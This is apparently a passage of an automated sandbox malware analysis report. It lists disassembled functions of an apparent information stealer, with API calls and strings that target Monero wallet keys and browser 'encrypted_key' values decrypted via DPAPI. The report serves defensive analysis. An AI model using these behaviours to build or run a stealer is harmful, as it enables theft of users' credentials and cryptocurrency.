                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 7912493e24b35b9c8e7fca6aa86afa6e783fdd4ab9d97ae63e89f32e7ce57ea5
                          • Instruction ID: 790e39ab6a7869ce0368436a4c43df8bd94aa928f556a07b1e9b37f3c6ebe380
                          • Opcode Fuzzy Hash: 7912493e24b35b9c8e7fca6aa86afa6e783fdd4ab9d97ae63e89f32e7ce57ea5
                          • Instruction Fuzzy Hash: FF91F1729103089BDB04FBA4DD96EEE77B8AF14300F508999F507B61D1EF346A49CB62
                          Function 00AFD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                            • Part of subcall function 00B08B60: GetSystemTime.KERNEL32(00B10E1A,018AEBF0,00B105AE,?,?,00AF13F9,?,0000001A,00B10E1A,00000000,?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B08B86
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00AFD801
                          • lstrlen.KERNEL32(00000000), ref: 00AFD99F
                          • lstrlen.KERNEL32(00000000), ref: 00AFD9B3
                          • DeleteFileA.KERNEL32(00000000), ref: 00AFDA32
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 23f8b815fb452d9787c028347cae9f6f96ed32766ba9ed0fcd89a76f04b67692
                          • Instruction ID: c5b6229beb62f28491e779f1f267d7c345ae5c30057edd17b6020258a933e4d1
                          • Opcode Fuzzy Hash: 23f8b815fb452d9787c028347cae9f6f96ed32766ba9ed0fcd89a76f04b67692
                          • Instruction Fuzzy Hash: 3281E0729103089BDB04FBA4DD96EEE77B8AF54300F508999F507B61D1EF346A09CB62
                          Function 00AFF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                            • Part of subcall function 00AF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AF99EC
                            • Part of subcall function 00AF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AF9A11
                            • Part of subcall function 00AF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AF9A31
                            • Part of subcall function 00AF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AF148F,00000000), ref: 00AF9A5A
                            • Part of subcall function 00AF99C0: LocalFree.KERNEL32(00AF148F), ref: 00AF9A90
                            • Part of subcall function 00AF99C0: CloseHandle.KERNEL32(000000FF), ref: 00AF9A9A
                            • Part of subcall function 00B08E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B08E52
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00B11580,00B10D92), ref: 00AFF54C
                          • lstrlen.KERNEL32(00000000), ref: 00AFF56B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 998311485-3310892237
                          • Opcode ID: 49a32fad7b60cc69f31d0b4f9eca114834b461a7fb60794d067ce6f64e54e160
                          • Instruction ID: 90640c1d464c8b0f310f2eb5dc2302ebf4ef4918a109bedf83ce817c5acd25b3
                          • Opcode Fuzzy Hash: 49a32fad7b60cc69f31d0b4f9eca114834b461a7fb60794d067ce6f64e54e160
                          • Instruction Fuzzy Hash: CB51F371D103089ADB04FBA4DC96DED77B9AF54300F50C9A8F516A71D1EF34AA09CBA2
                          Function 00B03560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: 677f2952f9805527c198e58da335cc0c28c48afd7b1313fac52d74b0158c4ee8
                          • Instruction ID: 980e8a47c2f97650304b519888a4532e658aab635011dbc56fab09b14da178e2
                          • Opcode Fuzzy Hash: 677f2952f9805527c198e58da335cc0c28c48afd7b1313fac52d74b0158c4ee8
                          • Instruction Fuzzy Hash: 9E414071D14209ABCB04EFA4D889AFEBBF8EF54704F008458E516762D0DB75AA45CFA2
                          Function 00AF9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00AF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AF99EC
                            • Part of subcall function 00AF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AF9A11
                            • Part of subcall function 00AF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AF9A31
                            • Part of subcall function 00AF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AF148F,00000000), ref: 00AF9A5A
                            • Part of subcall function 00AF99C0: LocalFree.KERNEL32(00AF148F), ref: 00AF9A90
                            • Part of subcall function 00AF99C0: CloseHandle.KERNEL32(000000FF), ref: 00AF9A9A
                            • Part of subcall function 00B08E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B08E52
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00AF9D39
                            • Part of subcall function 00AF9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AF4EEE,00000000,00000000), ref: 00AF9AEF
                            • Part of subcall function 00AF9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00AF4EEE,00000000,?), ref: 00AF9B01
                            • Part of subcall function 00AF9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AF4EEE,00000000,00000000), ref: 00AF9B2A
                            • Part of subcall function 00AF9AC0: LocalFree.KERNEL32(?,?,?,?,00AF4EEE,00000000,?), ref: 00AF9B3F
                            • Part of subcall function 00AF9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00AF9B84
                            • Part of subcall function 00AF9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00AF9BA3
                            • Part of subcall function 00AF9B60: LocalFree.KERNEL32(?), ref: 00AF9BD3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: d8af8a272630e179f43e6382136ac5340af9d7b6c4e2ce833999af0bdf1fdeda
                          • Instruction ID: 6c15f0adbc36c1d7bcf3e9f60154ef877c5e0881fd551199e1383de4d437835f
                          • Opcode Fuzzy Hash: d8af8a272630e179f43e6382136ac5340af9d7b6c4e2ce833999af0bdf1fdeda
                          • Instruction Fuzzy Hash: FD313EB6D1020DABCB14EBE4DD85BFFB7B8AB48304F544558FA05A7241EB349A04CBA1
                          Function 00B092E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(00B03AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00B03AEE,?), ref: 00B092FC
                          • GetFileSizeEx.KERNEL32(000000FF,00B03AEE), ref: 00B09319
                          • CloseHandle.KERNEL32(000000FF), ref: 00B09327
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID:
                          • API String ID: 1378416451-0
                          • Opcode ID: f2970477d29a2576ff4cf8cc4b632655c4b3b223be08e3c43f75dc224af96302
                          • Instruction ID: f5af8a5760cb92001509cce948e2d592e9e62174882b8c89b4d7e802190d3ad6
                          • Opcode Fuzzy Hash: f2970477d29a2576ff4cf8cc4b632655c4b3b223be08e3c43f75dc224af96302
                          • Instruction Fuzzy Hash: F8F01475F44208ABDB10DBA4DC89B9E7BF9AB48760F108294AA91A72C0D670AA018F54
                          Function 00B0C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __getptd.LIBCMT ref: 00B0C74E
                            • Part of subcall function 00B0BF9F: __amsg_exit.LIBCMT ref: 00B0BFAF
                          • __getptd.LIBCMT ref: 00B0C765
                          • __amsg_exit.LIBCMT ref: 00B0C773
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00B0C797
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 96b09a4e0e71d7a34a07661857f40a305aeb0d0545ec37ef7e9b9dcf42eb9b9c
                          • Instruction ID: 77888505740b0cf2c37349120b5443db02dc108f8b96bb82894f1b5056085a74
                          • Opcode Fuzzy Hash: 96b09a4e0e71d7a34a07661857f40a305aeb0d0545ec37ef7e9b9dcf42eb9b9c
                          • Instruction Fuzzy Hash: 41F09A329403019BD721BBB89806F8E3FE0AF00720F6082C9F415E72D2DF645D419E5A
                          Function 00B04F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B08DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B08E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00B04F7A
                          • lstrcat.KERNEL32(?,00B11070), ref: 00B04F97
                          • lstrcat.KERNEL32(?,018A8918), ref: 00B04FAB
                          • lstrcat.KERNEL32(?,00B11074), ref: 00B04FBD
                            • Part of subcall function 00B04910: wsprintfA.USER32 ref: 00B0492C
                            • Part of subcall function 00B04910: FindFirstFileA.KERNEL32(?,?), ref: 00B04943
                            • Part of subcall function 00B04910: StrCmpCA.SHLWAPI(?,00B10FDC), ref: 00B04971
                            • Part of subcall function 00B04910: StrCmpCA.SHLWAPI(?,00B10FE0), ref: 00B04987
                            • Part of subcall function 00B04910: FindNextFileA.KERNEL32(000000FF,?), ref: 00B04B7D
                            • Part of subcall function 00B04910: FindClose.KERNEL32(000000FF), ref: 00B04B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: 9574fb1f31d8c8c7892f0034889eb030c3acc7b586f70165b36f87c20cf628dc
                          • Instruction ID: b4e12ee3e7144e1f11b84c7fc7eeaa14d99ae5fabf07c95b7d95559ac8bb8585
                          • Opcode Fuzzy Hash: 9574fb1f31d8c8c7892f0034889eb030c3acc7b586f70165b36f87c20cf628dc
                          • Instruction Fuzzy Hash: 25219B76A00308A7C754F7B4DC46EE9377CAB54300F404594B6DA921D1EE7597C88BB2